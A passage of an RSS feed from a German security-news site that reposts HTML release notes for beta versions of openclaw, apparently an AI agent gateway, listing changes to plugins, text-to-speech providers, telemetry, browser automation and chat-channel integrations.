<li>Plugins/memory-lancedb: advance auto-capture cursors per session only after messages are processed or intentionally skipped, retry failed messages, survive compacted histories, and clear cursor state on session end. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4326654147" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71349" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71349/hovercard" href="https://github.com/openclaw/openclaw/issues/71349">#71349</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4051142895" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/42083" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/42083/hovercard" href="https://github.com/openclaw/openclaw/pull/42083">#42083</a>. Thanks @as775116191.</li>
<li>Plugins/memory-core: respect configured memory-search embedding concurrency during non-batch indexing so local Ollama embedding backends can serialize indexing instead of flooding the server. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4264947077" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66822" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66822/hovercard" href="https://github.com/openclaw/openclaw/issues/66822">#66822</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4265769455" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66931" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/66931/hovercard" href="https://github.com/openclaw/openclaw/pull/66931">#66931</a>) Thanks @oliviareid-svg and @LyraInTheFlesh.</li>
<li>Docker/update smoke: keep the package-derived update-channel fixture on package-shipped files and make its UI build stub create the asset the updater verifies. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Gateway/models: repair legacy <code>models.providers.*.api = "openai"</code> config values to <code>openai-completions</code>, and skip providers with future stale API enum values during startup instead of bricking the gateway. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332548488" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72477" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72477/hovercard" href="https://github.com/openclaw/openclaw/issues/72477">#72477</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332844009" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72542" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72542/hovercard" href="https://github.com/openclaw/openclaw/pull/72542">#72542</a>) Thanks @JooyoungChoi14 and @obviyus.</li>
<li>Gateway/skills: redact <code>apiKey</code> and secret-named <code>env</code> values from the <code>skills.update</code> RPC response to prevent leaking credentials into WebSocket traffic, client logs, or session transcripts. Config is still written to disk in full; only the response payload is redacted. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4306962807" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69998" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69998/hovercard" href="https://github.com/openclaw/openclaw/pull/69998">#69998</a>) Thanks @Ziy1-Tan.</li>
<li>Plugins/CLI: let flag-driven <code>openclaw channels add</code> install the selected channel plugin from its default source without opening an interactive prompt, fixing published npm Telegram setup in stdin-closed automation.</li>
<li>Onboarding/setup: keep first-run config reads, plugin compatibility notices, OpenAI Codex auth, post-auth default-model policy lookup, skip-auth, provider-scoped model pickers, and post-model sanity checks on cold manifest/setup metadata unless the user chooses to browse all models, avoiding full plugin/provider runtime loads between prompts. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Gateway/Bonjour: suppress known @homebridge/ciao cancellation and network assertion failures through scoped process handlers so malformed mDNS packets or restricted VPS networking disable/restart Bonjour instead of crashing the gateway. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4274075946" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67578" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/67578/hovercard" href="https://github.com/openclaw/openclaw/issues/67578">#67578</a>. Thanks @zenassist26-create.</li>
<li>Discord: keep late clicks on already-resolved exec approval buttons quiet when elevated mode auto-resolved the request, while still surfacing real approval submission failures. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4265667453" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66906" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66906/hovercard" href="https://github.com/openclaw/openclaw/issues/66906">#66906</a>. Thanks @rlerikse.</li>
<li>Telegram: send a fresh final message for long-lived preview-streamed replies so the visible Telegram timestamp reflects completion time instead of the preview creation time. Thanks @rubencu.</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[openclaw 2026.4.25-beta.4]]></title>
<description><![CDATA[2026.4.25
Highlights

Voice replies get a full TTS upgrade: /tts latest, chat-scoped auto-TTS controls, personas, per-agent/per-account overrides, and new Azure Speech, Xiaomi, Local CLI, Inworld, Volcengine, and ElevenLabs v3 provider coverage. Thanks @leonchui, @zoujiejun, @solar2ain, @cshape, ...]]></description>
<link>https://tsecurity.de/de/3465811/downloads/openclaw-2026425-beta4/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3465811/downloads/openclaw-2026425-beta4/</guid>
<pubDate>Sun, 26 Apr 2026 15:31:25 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>2026.4.25</h2>
<h3>Highlights</h3>
<ul>
<li>Voice replies get a full TTS upgrade: <code>/tts latest</code>, chat-scoped auto-TTS controls, personas, per-agent/per-account overrides, and new Azure Speech, Xiaomi, Local CLI, Inworld, Volcengine, and ElevenLabs v3 provider coverage. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/leonchui/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/leonchui">@leonchui</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zoujiejun/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zoujiejun">@zoujiejun</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/solar2ain/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/solar2ain">@solar2ain</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/cshape/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/cshape">@cshape</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/xuruiray/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/xuruiray">@xuruiray</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/itsuzef/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/itsuzef">@itsuzef</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/barronlroth/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/barronlroth">@barronlroth</a>.</li>
<li>Plugin startup and install paths move to the cold persisted registry, cutting broad manifest scans while making plugin update, repair, provider discovery, and install metadata more deterministic. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>OpenTelemetry coverage expands across model calls, token usage, tool loops, harness runs, exec processes, outbound delivery, context assembly, and memory pressure with bounded low-cardinality attributes. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jlapenna/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jlapenna">@jlapenna</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Lidang-Jiang/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Lidang-Jiang">@Lidang-Jiang</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/oc-factus/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/oc-factus">@oc-factus</a>.</li>
<li>Browser automation gets safer tab URLs, iframe-aware role snapshots, CDP readiness tuning, headless one-shot launch, and deeper browser doctor probes for slow hosts. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/beat843796/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/beat843796">@beat843796</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BenediktSchackenberg/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BenediktSchackenberg">@BenediktSchackenberg</a>.</li>
<li>Control UI and setup flows add PWA/Web Push support, Crestodian first-run repair, TUI setup, context mode selection, and a shorter startup greeting. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/eduardocruz/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/eduardocruz">@eduardocruz</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/SebTardif/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/SebTardif">@SebTardif</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kevinlin-openai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kevinlin-openai">@kevinlin-openai</a>.</li>
<li>Install/update hardening covers Windows, macOS, Linux, Docker, bundled plugin runtime deps, Node service restarts, LaunchAgent token rotation, and mixed-version gateway verification. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Kobevictor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Kobevictor">@Kobevictor</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/igormf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/igormf">@igormf</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/abhinas90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/abhinas90">@abhinas90</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jsompis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jsompis">@jsompis</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Solvely-Colin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Solvely-Colin">@Solvely-Colin</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/gucasbrg/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/gucasbrg">@gucasbrg</a>.</li>
</ul>
<h3>Changes</h3>
<ul>
<li>TTS/WhatsApp: add <code>/tts latest</code> read-aloud support with duplicate suppression and <code>/tts chat on|off|default</code> session-scoped auto-TTS overrides, completing the on-demand voice-note UX for current-chat replies. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4256179902" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66032" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66032/hovercard" href="https://github.com/openclaw/openclaw/issues/66032">#66032</a>.</li>
<li>TTS/channels: resolve channel and account TTS overrides generically, enabling Feishu and QQBot accounts to deep-merge <code>channels.&lt;channel&gt;.accounts.&lt;id&gt;.tts</code> over global and per-agent TTS config. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sahilsatralkar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sahilsatralkar">@sahilsatralkar</a>.</li>
<li>TTS/agents: allow <code>agents.list[].tts</code> to override global <code>messages.tts</code> for per-agent voices, and make <code>/tts audio</code>, <code>/tts status</code>, and the <code>tts</code> agent tool honor the active voice/provider override while keeping shared provider credentials and preferences in the existing TTS config surface.</li>
<li>Providers/Azure Speech: add Azure Speech as a bundled TTS provider with Speech-resource auth, voice listing, SSML escaping, native Ogg/Opus voice-note output, and telephony output. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4113089889" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/51776" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/51776/hovercard" href="https://github.com/openclaw/openclaw/pull/51776">#51776</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/leonchui/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/leonchui">@leonchui</a>.</li>
<li>Google Meet: add calendar-backed attendance export workflows, export manifests, dry-run previews, and tool parity for meeting records.</li>
<li>Control UI: add PWA install support and Web Push notifications for Gateway chat. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4068543152" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/44590" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/44590/hovercard" href="https://github.com/openclaw/openclaw/pull/44590">#44590</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/eduardocruz/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/eduardocruz">@eduardocruz</a>.</li>
<li>Browser automation: add safe tab URLs in agent responses plus a CDP-native role snapshot fallback with iframe-aware refs, cursor-clickable detection, target attach preparation, and <code>openclaw browser doctor --deep</code> live snapshot probing.</li>
<li>CLI/image generation: expose generic <code>--background</code> on <code>openclaw infer image generate</code> and <code>openclaw infer image edit</code>, keep <code>--openai-background</code> as an OpenAI alias, and let fal image generation honor <code>--output-format png|jpeg</code>.</li>
<li>Browser/config: allow local managed Chrome launch discovery and post-launch CDP readiness timeouts to be raised for slower hosts such as Raspberry Pi. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4264662087" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66803" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66803/hovercard" href="https://github.com/openclaw/openclaw/issues/66803">#66803</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/beat843796/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/beat843796">@beat843796</a>.</li>
<li>Discord: allow <code>channels.discord.voice.model</code> to override the LLM used for voice channel responses while keeping STT and TTS on their existing media settings. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4240023484" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64368" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/64368/hovercard" href="https://github.com/openclaw/openclaw/pull/64368">#64368</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mrdavey/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mrdavey">@mrdavey</a>.</li>
<li>Browser/CLI: add <code>openclaw browser start --headless</code> as a one-shot local managed browser launch override without rewriting persisted browser config. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BenediktSchackenberg/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BenediktSchackenberg">@BenediktSchackenberg</a>.</li>
<li>CLI/Crestodian/TUI: add the first-run setup helper, local planner fallback, full-TUI interactive Crestodian, startup progress indicators, context mode selector, and a shorter startup greeting. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329002099" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71720" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71720/hovercard" href="https://github.com/openclaw/openclaw/pull/71720">#71720</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329176612" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71760" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71760/hovercard" href="https://github.com/openclaw/openclaw/pull/71760">#71760</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/SebTardif/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/SebTardif">@SebTardif</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kevinlin-openai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kevinlin-openai">@kevinlin-openai</a>.</li>
<li>Plugins: migrate the local plugin registry automatically during package install/update, keeping install metadata in the plugin index while indexing existing plugin manifests for the new cold registry path. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins/doctor: make <code>openclaw doctor --fix</code> refresh the plugin index and cold registry index when needed without treating plugin install records as authored config. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins/hooks: add before-agent-finalize hooks, cron <code>jobId</code> hook context, bounded native permission fingerprints, and Codex MCP hook relay support. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329196089" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71765" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71765/hovercard" href="https://github.com/openclaw/openclaw/pull/71765">#71765</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329172189" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71758" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71758/hovercard" href="https://github.com/openclaw/openclaw/pull/71758">#71758</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4328919273" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71707" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71707/hovercard" href="https://github.com/openclaw/openclaw/pull/71707">#71707</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pashpashpash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pashpashpash">@pashpashpash</a>.</li>
<li>Plugins/tokenjuice: bump the bundled tokenjuice runtime to 0.6.3. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Diagnostics/OTEL: align model-call GenAI span attributes with OpenTelemetry stability opt-in semantics, keeping legacy <code>gen_ai.system</code> by default while emitting <code>gen_ai.provider.name</code> under <code>OTEL_SEMCONV_STABILITY_OPT_IN=gen_ai_latest_experimental</code>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Diagnostics/OTEL: support signal-specific OTLP endpoint overrides for traces, metrics, and logs via config or standard OTEL environment variables. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Diagnostics/OTEL: emit bounded telemetry exporter health diagnostics for startup and log-export failures without exporting raw error text. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Diagnostics/OTEL: export agent harness lifecycle telemetry as bounded <code>openclaw.harness.run</code> spans and <code>openclaw.harness.duration_ms</code> metrics so QA-lab, Codex, and future harnesses share one trace shape. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Diagnostics/trace: propagate W3C <code>traceparent</code> headers from trusted model-call trace context to provider transports while replacing caller-supplied traceparent values. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Diagnostics/Prometheus: add a bundled <code>diagnostics-prometheus</code> plugin with a protected gateway scrape route for low-cardinality diagnostics metrics. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/CLI: add <code>openclaw plugins registry</code> for explicit persisted-registry inspection and <code>--refresh</code> repair without making normal startup rescan plugin locations. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/CLI: make <code>openclaw plugins list</code> read the cold persisted registry snapshot by default, leaving module-aware diagnostics to <code>plugins doctor</code> and <code>plugins inspect</code>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/startup: move gateway startup plugin planning onto the versioned cold registry index, with postinstall repair for older registry files that predate startup metadata. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/startup: normalize startup and provider plugin enablement through registry aliases so boot paths do not need the legacy manifest alias scan. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Providers/plugins: resolve provider ownership, provider discovery scopes, and catalog-hook provider ids from the cold plugin registry instead of rescanning manifests on those paths. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/registry: keep installed plugin index records focused on install/state/load paths and resolve plugin capabilities from manifests scoped to indexed plugins. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins/registry: route cold manifest and capability lookups through the installed plugin index so setup, channels, config, secrets, doctor, and provider metadata paths avoid broad plugin-root scans before runtime execution. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>CLI/models: speed up <code>models list --all --provider &lt;id&gt;</code> for static manifest-backed providers by loading catalog rows through the installed plugin index instead of broad manifest scans or runtime suppression hooks. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>CLI/models: use OpenClaw Provider Index preview rows as the final cold fallback for installable providers, while keeping user config, installed manifests, and refreshed cache rows above provider-index metadata. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Providers/plugins: keep onboarding and auth-choice setup lists on cold manifest/install metadata and add Provider Index install metadata for not-yet-installed provider plugins. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Providers/plugins: keep provider setup guidance and configure auth imports on cold manifest metadata, with a regression guard against static provider-runtime imports on setup/configure list paths. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>CLI/capabilities: keep capability command registration from importing the models auth runtime until <code>model auth login</code> actually runs. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>CLI/configure: keep web-search configure prompts on cold plugin registry metadata until the user chooses managed search setup. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/chat commands: refresh the persisted plugin registry after <code>/plugins enable</code> and <code>/plugins disable</code>, matching the CLI mutation path. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/compat: mark <code>OPENCLAW_DISABLE_PERSISTED_PLUGIN_REGISTRY</code> as a deprecated break-glass switch and point operators at registry repair instead. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/compat: expand the central compatibility registry with dated owners, replacements, and maximum three-month removal targets for legacy SDK, manifest, setup, registry-migration, and agent-runtime surfaces. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/registry: ignore stale persisted registry reads when plugin policy no longer matches current config, and stamp generated registry files with a do-not-edit warning. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Config/plugins: keep plugin command-alias validation on cold manifest metadata instead of importing the runtime alias resolver. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Security/plugins: keep web-search credential presence checks on cold config, env, and manifest metadata instead of importing web-search provider runtime. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
